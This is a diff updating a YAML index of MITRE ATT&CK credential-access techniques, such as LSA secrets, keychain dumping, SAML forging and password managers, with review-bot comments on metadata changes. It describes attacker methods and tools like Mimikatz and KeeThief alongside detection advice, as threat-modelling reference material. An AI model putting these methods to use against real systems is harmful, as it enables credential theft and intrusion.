name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -43616,14 +44271,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -43657,8 +44311,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -43675,11 +44329,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -43697,7 +44350,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -43714,10 +44367,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -43741,46 +44394,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
@@ -43801,65 +44420,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
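Review bot: `spec_version: '2.1'` is dropped from T1555.001 (and, as the later hunks show, from every technique in this patch) with nothing replacing it, while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0 and `revoked: false` / `x_mitre_deprecated: false` are introduced; the wholesale key reordering reads as a regenerated dump rather than a hand edit, so the commit message should name the ATT&CK data version and generator run this came from and state that the `spec_version` removal is intentional, since any index consumer filtering on that key will stop matching.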
@@ -43868,6 +44484,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -43875,31 +44494,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
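Review bot: the Tilbury reference copied into the new `external_references` block for T1003.004 still reads `1Windows Credentials: Attack, Mitigation, Defense` with a stray leading digit in the title; it is upstream ATT&CK data, so it should be reported and fixed at the source rather than patched in this index, but it is worth flagging in the PR. The same hunk removes `x_mitre_permissions_required: [SYSTEM]` without replacement; the description still states the SYSTEM requirement so no information is lost, but confirm no index tooling reads that key, as it disappears from every entry in this patch.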
@@ -43912,14 +44563,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
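Review bot: T1606.002's platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (version 1.3 to 1.4); if the per-platform index files are derived from `x_mitre_platforms`, they must be regenerated in the same change, otherwise the SAML-token technique silently drops out of the Office 365 and Google Workspace views without appearing in any view for the two new platform names.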
@@ -43960,14 +44611,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44030,81 +44678,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
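Review bot: the regenerated T1555.005 entry ends with `x_mitre_modified_by_ref` followed directly by `atomic_tests: []` and no `identifier: T1555.005` line, whereas the neighbouring entries (T1003.007 above, T1040 below) keep `identifier:` immediately before `atomic_tests:`; confirm the key was not lost in the reorder, since anything mapping index entries back to technique IDs depends on it. The removal of `x_mitre_permissions_required: [User]` here is consistent with the rest of the patch.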
@@ -44189,12 +44835,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44243,38 +44888,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -44298,76 +44918,129 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
